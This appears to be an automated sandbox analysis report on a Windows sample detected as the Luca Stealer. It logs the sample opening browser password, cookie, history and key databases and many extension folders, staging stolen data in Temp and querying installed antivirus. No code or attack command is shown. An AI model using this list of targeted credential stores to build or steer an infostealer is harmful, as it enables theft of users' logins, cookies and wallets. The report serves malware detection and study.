          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Autofill\Edge_Default.txt VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected Luca Stealer
          Source: Yara matchFile source: 765iYbgWn9.exe, type: SAMPLE
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 0.0.765iYbgWn9.exe.7ff62f040000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 7552, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
